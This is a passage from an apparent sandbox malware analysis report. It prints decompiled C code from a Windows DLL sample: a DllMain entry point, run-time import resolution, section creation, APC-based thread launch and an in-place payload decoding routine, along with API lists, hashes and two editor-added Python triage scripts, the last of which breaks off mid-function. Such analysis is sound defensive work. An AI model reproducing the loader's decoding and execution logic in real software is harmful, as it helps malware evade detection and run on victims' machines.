• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2280543912-0
                                                                                                                                                                              • Opcode ID: f433959e39203ec25b676f9588d1735670a8bfb78e2e19195bb882e30b644e36
                                                                                                                                                                              • Instruction ID: 14cdf2cfbf8087e2f16d89b8125cd3cd34f8b1ca9ead18c56269662bd79923a6
                                                                                                                                                                              • Opcode Fuzzy Hash: f433959e39203ec25b676f9588d1735670a8bfb78e2e19195bb882e30b644e36
                                                                                                                                                                              • Instruction Fuzzy Hash: 49315EF5C04721EBE710DF668C4495F7BEDFEC6655B110A2AF566C214CEB30C9049AB2
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                              				_Unknown_base(*)()* _t33;
                                                                                                                                                                              				_Unknown_base(*)()* _t36;
                                                                                                                                                                              				_Unknown_base(*)()* _t39;
                                                                                                                                                                              				_Unknown_base(*)()* _t42;
                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                              				struct HINSTANCE__* _t50;
                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                              
                                                                                                                                                                              				_t56 = E66DB1C8F(0x20);
                                                                                                                                                                              				if(_t56 == 0) {
                                                                                                                                                                              					_v8 = 8;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t50 = GetModuleHandleA( *0x66db41d0 + 0x66db5014);
                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                              					_t29 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db50e1);
                                                                                                                                                                              					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                              					if(_t29 == 0) {
                                                                                                                                                                              						L8:
                                                                                                                                                                              						E66DB136A(_t56);
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t33 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db50f1);
                                                                                                                                                                              						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                              							goto L8;
                                                                                                                                                                              						} else {
                                                                                                                                                                              							_t36 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db5104);
                                                                                                                                                                              							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                              							if(_t36 == 0) {
                                                                                                                                                                              								goto L8;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								_t39 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db5119);
                                                                                                                                                                              								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                              								if(_t39 == 0) {
                                                                                                                                                                              									goto L8;
                                                                                                                                                                              								} else {
                                                                                                                                                                              									_t42 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db512f);
                                                                                                                                                                              									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                              									if(_t42 == 0) {
                                                                                                                                                                              										goto L8;
                                                                                                                                                                              									} else {
                                                                                                                                                                              										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                              										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                              										_t46 = E66DB18D1(_t56, _a12); // executed
                                                                                                                                                                              										_v8 = _t46;
                                                                                                                                                                              										if(_t46 != 0) {
                                                                                                                                                                              											goto L8;
                                                                                                                                                                              										} else {
                                                                                                                                                                              											 *_a16 = _t56;
                                                                                                                                                                              										}
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				return _v8;
                                                                                                                                                                              			}

                                                                                                                                                                              0x66db1ab3
                                                                                                                                                                              0x66db1ab7
                                                                                                                                                                              0x66db1b78
                                                                                                                                                                              0x66db1abd
                                                                                                                                                                              0x66db1ad5
                                                                                                                                                                              0x66db1ae4
                                                                                                                                                                              0x66db1aeb
                                                                                                                                                                              0x66db1aef
                                                                                                                                                                              0x66db1af2
                                                                                                                                                                              0x66db1b70
                                                                                                                                                                              0x66db1b71
                                                                                                                                                                              0x66db1af4
                                                                                                                                                                              0x66db1b01
                                                                                                                                                                              0x66db1b05
                                                                                                                                                                              0x66db1b08
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b0a
                                                                                                                                                                              0x66db1b17
                                                                                                                                                                              0x66db1b1b
                                                                                                                                                                              0x66db1b1e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b20
                                                                                                                                                                              0x66db1b2d
                                                                                                                                                                              0x66db1b31
                                                                                                                                                                              0x66db1b34
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b36
                                                                                                                                                                              0x66db1b43
                                                                                                                                                                              0x66db1b47
                                                                                                                                                                              0x66db1b4a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b4c
                                                                                                                                                                              0x66db1b52
                                                                                                                                                                              0x66db1b58
                                                                                                                                                                              0x66db1b5d
                                                                                                                                                                              0x66db1b64
                                                                                                                                                                              0x66db1b67
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b69
                                                                                                                                                                              0x66db1b6c
                                                                                                                                                                              0x66db1b6c
                                                                                                                                                                              0x66db1b67
                                                                                                                                                                              0x66db1b4a
                                                                                                                                                                              0x66db1b34
                                                                                                                                                                              0x66db1b1e
                                                                                                                                                                              0x66db1b08
                                                                                                                                                                              0x66db1af2
                                                                                                                                                                              0x66db1b86

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 66DB1C8F: HeapAlloc.KERNEL32(00000000,?,66DB117D,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1C9B
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AC9
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AEB
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B01
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B17
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B2D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B43
                                                                                                                                                                                • Part of subcall function 66DB18D1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 66DB192E
                                                                                                                                                                                • Part of subcall function 66DB18D1: memset.NTDLL ref: 66DB1950
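The API list above is the part of a decompiled-function listing that a triager most often wants in machine-readable form. The Python below is an added example by the editor, not code from the sandbox or from the sample: it parses these bullet lines (copied into the script as constructed input), separates direct calls from those the report attributes to sub-functions, and reads the recovered NtCreateSection arguments by their documented parameter order. The interpretation of 0x000F001F as SECTION_ALL_ACCESS and 0x08000000 as SEC_COMMIT follows the documented Windows constants; the "resolution" and "section" API groupings are the editor's own triage heuristics, not anything the report defines.

```python
"""Parse the 'APIs' block of a Joe Sandbox decompiled-function listing.

Editor's added example, not code from the sandbox or the sample. The input
below is the API list of this function as printed in the report; the
'resolution' / 'section' groupings are the editor's own triage heuristics.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed input: the bullet lines copied from the report's APIs block.
API_BLOCK = """\
  • Part of subcall function 66DB1C8F: HeapAlloc.KERNEL32(00000000,?,66DB117D,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1C9B
• GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AC9
• GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AEB
• GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B01
• GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B17
• GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B2D
• GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B43
  • Part of subcall function 66DB18D1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 66DB192E
  • Part of subcall function 66DB18D1: memset.NTDLL ref: 66DB1950
"""

# One bullet: optional sub-call attribution, Api.MODULE, optional (args), ref: address.
LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<subcall>[0-9A-Fa-f]+):\s*)?
        (?P<api>\w+)\.(?P<module>\w+)
        (?:\((?P<args>[^)]*)\))?
        \s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)

# Documented Windows constants used when decoding the NtCreateSection arguments.
SECTION_ALL_ACCESS = 0x000F001F
SEC_COMMIT = 0x08000000

# Editor's heuristic groupings (assumption, not part of the report).
RESOLUTION_APIS = {"GetModuleHandleA", "GetModuleHandleW", "GetProcAddress", "LoadLibraryA", "LoadLibraryW"}
SECTION_APIS = {"NtCreateSection", "ZwCreateSection", "NtMapViewOfSection", "ZwMapViewOfSection"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # recovered argument strings, '?' where the sandbox could not resolve a value
    ref: int                # address of the call instruction
    subcall: Optional[int]  # address of the sub-function when the call is attributed to one


def parse_api_block(text: str) -> list:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw_args = m["args"]
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args is not None else ()
        subcall = int(m["subcall"], 16) if m["subcall"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), subcall))
    return calls


def summarise(calls) -> dict:
    """Triage view: does the function resolve imports at run time, and does it
    (directly or through a sub-call) create a section object?"""
    return {
        "direct_getprocaddress": sum(1 for c in calls if c.subcall is None and c.api == "GetProcAddress"),
        "resolves_imports_at_runtime": any(c.api in RESOLUTION_APIS for c in calls),
        "creates_section": any(c.api in SECTION_APIS for c in calls),
        "subcalls": sorted({c.subcall for c in calls if c.subcall is not None}),
        "api_counts": dict(Counter(c.api for c in calls)),
    }


def decode_nt_create_section(call: ApiCall) -> dict:
    """Read the recovered arguments by the documented parameter order:
    (SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
     SectionPageProtection, AllocationAttributes, FileHandle).
    Values past the seventh are stack contents the sandbox dumped, not parameters."""
    def hexarg(i):
        if i >= len(call.args) or call.args[i] == "?":
            return None
        return int(call.args[i], 16)

    access, alloc, file_handle = hexarg(1), hexarg(5), hexarg(6)
    return {
        "desired_access_all": access == SECTION_ALL_ACCESS,
        "sec_commit": alloc is not None and bool(alloc & SEC_COMMIT),
        "pagefile_backed": file_handle == 0,  # NULL FileHandle: section backed by the paging file
    }
```

Run over the block above, `summarise` reports five direct GetProcAddress calls, both heuristics true, and sub-calls 66DB18D1 and 66DB1C8F; `decode_nt_create_section` on the NtCreateSection line yields a SECTION_ALL_ACCESS, SEC_COMMIT, pagefile-backed section (FileHandle 0), which is what the recovered argument list shows. The page-protection argument is unresolved ("?") in the report and is left as None rather than guessed.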
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1632424568-0
                                                                                                                                                                              • Opcode ID: c24b95907f299668a7675ea3b55f625c0dc62a0185f4bf5ce597c008bb9af660
                                                                                                                                                                              • Instruction ID: ac02a517394bf4b824812371b47fd9c6491a3447c2d5047edf5142451f7b74c1
                                                                                                                                                                              • Opcode Fuzzy Hash: c24b95907f299668a7675ea3b55f625c0dc62a0185f4bf5ce597c008bb9af660
                                                                                                                                                                              • Instruction Fuzzy Hash: 202103F190021AEFEB10DF69CC40E5A77EDEB46684B014615E916C731DE730E911CBA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

C-Code - Quality: 86%
			// Decompiled DLL entry point. The argument usage matches DllMain(hinstDLL, fdwReason, lpvReserved):
			// _a4 is stored as a module base, _a8 is compared against 1 (DLL_PROCESS_ATTACH) and 0 (DLL_PROCESS_DETACH),
			// and _a12 is passed on to the worker. Comments are editorial annotations of the recovered code.
			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;
				void* _t41; // declaration added; the raw decompiler output uses _t41 without declaring it

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1; // return TRUE unless initialisation fails
				if(_t9 == 0) { // fdwReason == 0: DLL_PROCESS_DETACH
					_t10 = InterlockedDecrement(0x66db4188); // attach reference count
					__eflags = _t10;
					if(_t10 == 0) { // last detach: tear everything down
						__eflags =  *0x66db418c;
						if( *0x66db418c != 0) { // handle returned by E66DB1CA4 on attach (see below)
							_t36 = 0x2328; // 9000 ms wait budget
							while(1) {
								SleepEx(0x64, 1); // 100 ms, alertable
								__eflags =  *0x66db4198;
								if( *0x66db4198 == 0) { // flag handed to the worker on attach; zero apparently means it has finished
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) { // keep polling until the 9 s budget is spent
									continue;
								}
								break;
							}
							CloseHandle( *0x66db418c);
						}
						HeapDestroy( *0x66db4190); // private heap created on attach
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x66db4188) == 1) { // fdwReason == 1: DLL_PROCESS_ATTACH, first attach only
						_t18 = HeapCreate(0, 0x400000, 0); // executed; 4 MiB initial size, growable (maximum 0)
						_t41 = _t18;
						 *0x66db4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0; // report failure to the loader
						} else {
							 *0x66db41b0 = _a4; // own module base (hinstDLL)
							asm("lock xadd [eax], edi"); // atomic add; operands not recovered by the decompiler
							_push( &_a8);
							// E66DB1CA4 takes the routine E66DB1D32 and an argument built by E66DB1EE0 from lpvReserved,
							// the flag at 0x66db4198 and the heap; it returns a handle. Its body is not part of this listing.
							_t23 = E66DB1CA4(E66DB1D32, E66DB1EE0(_a12, 1, 0x66db4198, _t41));
							 *0x66db418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax"); // atomic add on failure; operands not recovered by the decompiler
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

                                                                                                                                                                              0x66db1e07
                                                                                                                                                                              0x66db1e13
Instruction addresses: 0x66db1e15, 0x66db1e18, 0x66db1e8e, 0x66db1e94, 0x66db1e96, 0x66db1e98, 0x66db1e9e, 0x66db1ea0, 0x66db1ea5, 0x66db1ea8, 0x66db1eb3, 0x66db1eb5, 0x00000000, 0x00000000, 0x66db1eb7, 0x66db1eba, 0x66db1ebc, 0x00000000, 0x00000000, 0x00000000, 0x66db1ebc, 0x66db1ec4, 0x66db1ec4, 0x66db1ed0, 0x66db1ed0, 0x66db1e1a, 0x66db1e1b, 0x66db1e3b, 0x66db1e41, 0x66db1e43, 0x66db1e48, 0x66db1e84, 0x66db1e84, 0x66db1e4a, 0x66db1e52, 0x66db1e59, 0x66db1e63, 0x66db1e6f, 0x66db1e76, 0x66db1e7b, 0x66db1e80, 0x00000000, 0x66db1e80, 0x66db1e7b, 0x66db1e48, 0x66db1e1b, 0x66db1edd

                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedIncrement.KERNEL32(66DB4188), ref: 66DB1E26
                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 66DB1E3B
                                                                                                                                                                                • Part of subcall function 66DB1CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,66DB4198,66DB1E74), ref: 66DB1CBB
                                                                                                                                                                                • Part of subcall function 66DB1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 66DB1CD0
                                                                                                                                                                                • Part of subcall function 66DB1CA4: GetLastError.KERNEL32(00000000), ref: 66DB1CDB
                                                                                                                                                                                • Part of subcall function 66DB1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 66DB1CE5
                                                                                                                                                                                • Part of subcall function 66DB1CA4: CloseHandle.KERNEL32(00000000), ref: 66DB1CEC
                                                                                                                                                                                • Part of subcall function 66DB1CA4: SetLastError.KERNEL32(00000000), ref: 66DB1CF5
                                                                                                                                                                              • InterlockedDecrement.KERNEL32(66DB4188), ref: 66DB1E8E
                                                                                                                                                                              • SleepEx.KERNEL32(00000064,00000001), ref: 66DB1EA8
                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 66DB1EC4
                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 66DB1ED0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2110400756-0
                                                                                                                                                                              • Opcode ID: db79995f28318d59364169e920ee822974941228e628dfbb527894a9bda5cb16
                                                                                                                                                                              • Instruction ID: c5908ce77b9be4742aa774ae8183c71d84a4d43fae24e663615185f84358abb2
                                                                                                                                                                              • Opcode Fuzzy Hash: db79995f28318d59364169e920ee822974941228e628dfbb527894a9bda5cb16
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B2189F1E10215EBEF00CFAACC84A4E7BBAFB9A7A17150029E616D254CE730CD14CB60
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB1CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                              				_Unknown_base(*)()* _v0;
                                                                                                                                                                              				void* _t4;
                                                                                                                                                                              				long _t6;
                                                                                                                                                                              				long _t11;
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              
                                                                                                                                                                              				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x66db41cc, 0, _a12); // executed
                                                                                                                                                                              				_t13 = _t4;
                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                              					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                              					if(_t6 == 0) {
                                                                                                                                                                              						_t11 = GetLastError();
                                                                                                                                                                              						TerminateThread(_t13, _t11);
                                                                                                                                                                              						CloseHandle(_t13);
                                                                                                                                                                              						_t13 = 0;
                                                                                                                                                                              						SetLastError(_t11);
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t13;
                                                                                                                                                                              			}
Instruction addresses: 0x66db1cbb, 0x66db1cc1, 0x66db1cc5, 0x66db1cd0, 0x66db1cd8, 0x66db1ce1, 0x66db1ce5, 0x66db1cec, 0x66db1cf3, 0x66db1cf5, 0x66db1cfb, 0x66db1cd8, 0x66db1cff

                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,00000000,?,66DB4198,66DB1E74), ref: 66DB1CBB
                                                                                                                                                                              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 66DB1CD0
                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 66DB1CDB
                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 66DB1CE5
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 66DB1CEC
                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 66DB1CF5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3832013932-0
                                                                                                                                                                              • Opcode ID: 8becf8ce990dc4c847b6700123f17f44de587aedbf09baeaec64893c066b351d
                                                                                                                                                                              • Instruction ID: de17e442b59181d7e7725f938708211e80b3a4ed21d2e6d6dd0b16db465ed371
                                                                                                                                                                              • Opcode Fuzzy Hash: 8becf8ce990dc4c847b6700123f17f44de587aedbf09baeaec64893c066b351d
                                                                                                                                                                              • Instruction Fuzzy Hash: B3F082B2604631FBEB115FA68C0CF4BBF6AFF8A751F020514F70591149C7318C11AB95
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                              			E66DB15A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                              				unsigned int _v12;
                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                              				char _v20;
                                                                                                                                                                              				void* _v24;
                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                              				void* _v36;
                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                              				void* _t46;
                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                              				void* _t78;
                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                              
				_t77 =  *0x66db41b0;                                    // base of the region this routine works on (global)
				_t39 = E66DB1A4B(_t77,  &_v20,  &_v12);                 // yields an offset (_v20) and a byte length (_v12) inside it
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);   // sbb idiom: length rounded up to whole 0x1000-byte pages
					_t78 = _t77 + _v20;                                  // start of the source bytes
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed   (0x3000 = MEM_COMMIT|MEM_RESERVE, 4 = PAGE_READWRITE: a non-executable scratch buffer)
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;                                        // 8 matches the Win32 code ERROR_NOT_ENOUGH_MEMORY
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x66db41cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;                          // distance from the source to the scratch buffer
							_t11 = _t66 + 0x66db5137; // 0x66db5137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {                                   // one iteration per page
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E66DB1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);   // per-page routine: source page in, scratch page out (body not shown here)
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x66db41cc = _t47;                       // running check value, kept in a global
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;                                  // check value does not match the hard-coded constant; 0xc matches ERROR_INVALID_ACCESS
						} else {
							memcpy(_v36, _v24, _v12);                     // accepted: the scratch buffer is copied back over the source in place
						}
						VirtualFree(_v24, 0, 0x8000); // executed           (0x8000 = MEM_RELEASE)
					}
				}
				return _v16;
			}

APIs
• VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 66DB15F9
• memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,66DB17EC), ref: 66DB168B
• VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 66DB16A6
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: Virtual$AllocFreememcpy
• String ID: Mar 26 2021
• API String ID: 4010158826-2175073649
• Opcode ID: 41d20c5052719de4a54109e4fbcb49d92b01452a49b0bbf47bf33c7dc4e1b843
• Instruction ID: e909f4425caa8d572e70880e5048545842fbb8450d52ffe53552547aef38029c
• Opcode Fuzzy Hash: 41d20c5052719de4a54109e4fbcb49d92b01452a49b0bbf47bf33c7dc4e1b843
• Instruction Fuzzy Hash: 913130B1E00219EBDB00CF99CC81ADEBBB5FF49744F148169E905AB249D771AA058FD0
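The dump file names in the Memory Dump Source list carry the region base address plus two hex fields that look like the Protect and Type members of a MEMORY_BASIC_INFORMATION. The following Python is an added example, not part of the Joe Sandbox report: it splits the names into fields, decodes those two values with the winnt.h constants, and orders the regions by RVA from the module base 0x66DB0000 stated above. The field layout (process index, run, dump id, base, protect, type) is an assumption inferred from the names on this page, not documented behaviour of the sandbox.

```python
"""Decode sandbox memory-dump file names (added example, not from the report).

Field layout is an ASSUMPTION inferred from the names on this page:
  <proc>.<run>.<dumpid>.<base>.<protect>.<type>.sdmp
<protect> and <type> are read as the Protect/Type members of a
MEMORY_BASIC_INFORMATION (winnt.h values).
"""
import re

# winnt.h page-protection constants (low byte), modifiers, and MBI Type values
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

NAME_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<type>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


def decode_protect(value):
    """Base protection from the low byte, plus any modifier bits that are set."""
    names = [PAGE_PROTECT.get(value & 0xFF, f"0x{value & 0xFF:x}")]
    names += [n for bit, n in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def parse_dump_name(name):
    m = NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name}")
    protect = int(m["protect"], 16)
    mtype = int(m["type"], 16)
    return {
        "process_index": int(m["proc"], 16),
        "run": int(m["run"], 16),
        "dump_id": int(m["dumpid"]),
        "base": int(m["base"], 16),
        "protect": decode_protect(protect),
        "type": MEM_TYPE.get(mtype, f"0x{mtype:x}"),
        # any of PAGE_EXECUTE* sets a bit in the high nibble of the low byte
        "executable": bool(protect & 0xF0),
    }


def map_regions(names, module_base):
    """Order the dumps by address and give each its RVA from module_base."""
    rows = sorted((parse_dump_name(n) for n in names), key=lambda r: r["base"])
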